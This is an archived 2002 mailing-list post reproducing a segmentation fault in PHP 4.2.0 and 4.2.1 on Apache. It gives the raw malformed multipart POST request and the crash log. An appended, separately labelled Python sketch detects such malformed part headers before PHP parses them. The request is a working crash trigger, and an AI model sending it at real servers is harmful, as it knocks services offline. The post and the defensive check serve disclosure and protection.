How to reproduce PHP segfault.

From: Joseph S. Testa II (jtestaat_private)
Date: Wed Jul 24 2002 - 06:47:10 PDT


    Happy Wednesday.
    
         The following is an example of how to reproduce the segmentation violation
    in PHP 4.2.0 & PHP 4.2.1 with Apache 1.3.26 on Linux x86:
    
    
    [jdog@wonderland logs]$ telnet 192.168.x.x 80
    Trying 192.168.x.x...
    Connected to 192.168.x.x.
    Escape character is '^]'.
    POST /chad_owns_me.php HTTP/1.0
    Content-type: multipart/form-data; boundary=---------------------------123
    Content-length: 129
    
    -----------------------------123
    Content-Disposition: filename
    
    http://www.rapid7.com/
    -----------------------------123--
    
    Connection closed by foreign host.
    [jdog@wonderland logs]$ cat error_log
    [Tue Jul 23 11:11:52 2002] [notice] child pid 8948 exit signal Segmentation fault (11)
    [jdog@wonderland logs]$
    
    
         Note that a path to an existing PHP file must be used, otherwise the PHP
    interpreter will not be invoked.
    
    
         - Joe
    
    
    GPG key:  http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
    A22B 2683 C40E 5443 AE52  AD6D 65B2 F5DF 4B11 06B4
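
A defensive check for the part header shown in the post, added here as an example and not part of the original message. multipart/form-data expects each part to carry `Content-Disposition: form-data; name=...`, and this sketch flags parts that do not; the function name `malformed_parts`, the helper `_body` and the field name `url` are assumptions made for illustration.

```python
import re

BOUNDARY_RE = re.compile(r'boundary="?([^";\s]+)"?', re.I)
NAME_RE = re.compile(r';\s*name\s*=', re.I)

def malformed_parts(content_type, body):
    """Return (part_number, reason) for every part whose Content-Disposition
    is not of the form `form-data; name=...`."""
    m = BOUNDARY_RE.search(content_type)
    if not m:
        return [(0, "no boundary parameter in Content-Type")]
    delim = "--" + m.group(1)
    findings = []
    # Accept bare LF as well as CRLF line endings.
    chunks = body.replace("\r\n", "\n").split(delim)
    for num, chunk in enumerate(chunks[1:], start=1):
        if chunk.startswith("--"):          # closing delimiter reached
            break
        head = chunk.split("\n\n", 1)[0]    # header block of this part
        headers = {}
        for line in head.split("\n"):
            if ":" in line:
                key, value = line.split(":", 1)
                headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition")
        if disp is None:
            findings.append((num, "no Content-Disposition header"))
            continue
        dtype = disp.split(";", 1)[0].strip().lower()
        if dtype != "form-data":
            findings.append((num, f"disposition type {dtype!r} is not form-data"))
        elif not NAME_RE.search(disp):
            findings.append((num, "form-data part has no name parameter"))
    return findings

# Constructed inputs: BAD mirrors the part header in the post, GOOD is a normal field.
BOUNDARY = "---------------------------123"
CTYPE = "multipart/form-data; boundary=" + BOUNDARY
def _body(disposition):
    return "\r\n".join(["--" + BOUNDARY, "Content-Disposition: " + disposition,
                        "", "http://www.rapid7.com/", "--" + BOUNDARY + "--", ""])
BAD = _body("filename")
GOOD = _body('form-data; name="url"')

if __name__ == "__main__":
    print(malformed_parts(CTYPE, BAD))
    print(malformed_parts(CTYPE, GOOD))
```

A check like this belongs in front of the interpreter (reverse proxy or request filter), so that a part with an unexpected disposition is rejected before PHP parses the body.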
    


